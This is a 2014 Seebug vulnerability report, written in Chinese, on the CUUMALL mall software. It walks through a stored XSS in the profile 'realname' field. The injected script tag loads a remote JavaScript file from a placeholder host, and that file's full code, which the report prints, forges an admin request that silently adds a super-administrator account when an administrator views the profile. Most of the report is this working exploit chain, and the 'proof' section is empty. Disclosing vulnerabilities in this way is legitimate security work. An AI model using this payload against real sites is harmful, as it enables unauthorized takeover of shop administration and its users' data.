CUUMALL商场存储型xss+csrf添加超级管理员

2014-06-20T00:00:00
ID SSV:95194
Type seebug
Reporter Root
Modified 2014-06-20T00:00:00

Description

简要描述:

CUUMALL 存储型xss+csrf添加超级管理员

详细说明:

注册用户后,然后在完善用户资料后,然后进行重新编辑如图所示:

<img src="https://images.seebug.org/upload/201406/15152230df9c53d1e7d3fe8a3a77ff80c21b282c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

这里我们抓一次包,然后重放post数据为: shen=%E6%B9%96%E5%8C%97&shi=%E8%8D%86%E5%B7%9E%E5%B8%82&qu=%E6%B2%99%E5%B8%82%E5%8C%BA&uid=529&realname="><script src=http://xxx/xss_csrf_shell.js></script><sp&email=atest%40qq.com&more=sdasdada&youbian=712000&tel=2294568226&mob=15802996564&qq=3154678&ww=22365&imageField.x=80&imageField.y=25&hash=542651f0fd15535c418aaa9ebdc11646 如图所示:

<img src="https://images.seebug.org/upload/201406/151524071287f61ad62d8b84189e2cc333dff28c.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

xss_csrf_shell.js内容如下:

``` function ajax(){

var request = false;

if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

    for(var i=0; i&lt;versions.length; i++) {

        try {

            request = new ActiveXObject(versions[i]);

        } catch(e) {}

    }

}

return request;

}var _x = ajax();

postgo(); function postgo() {

src="http://demo.cuumall.com/index.php/admin/adminmgr/addadminuser";

data="username=test4&password=111111&password2=111111&admingroup=14&email=test4%40163.com&imageField.x=73&imageField.y=26&__hash__=0bdd686e67897ac78b07c171571da709";

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){ _x.open(_m,_s,false);

cookie = document.cookie;
if(_m=="POST"){
    _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    _x.setRequestHeader("Cookie",cookie);
}

_x.send(_a);

return _x.responseText;

} ```

如上内容所示我们添加一个test4管理员,当管理员查看用户信息时候:

<img src="https://images.seebug.org/upload/201406/151527593b6f510c3fab2ee0a844c81293e5df1d.png" alt="5.png" width="600" onerror="javascript:errimg(this);">

然后我们到管理员权限,下面的管理员列表可以看到:

<img src="https://images.seebug.org/upload/201406/15152908d92716a29c6138198421d7183cb67480.png" alt="6.png" width="600" onerror="javascript:errimg(this);">

ok!!!!!!!!!!!!!

漏洞证明: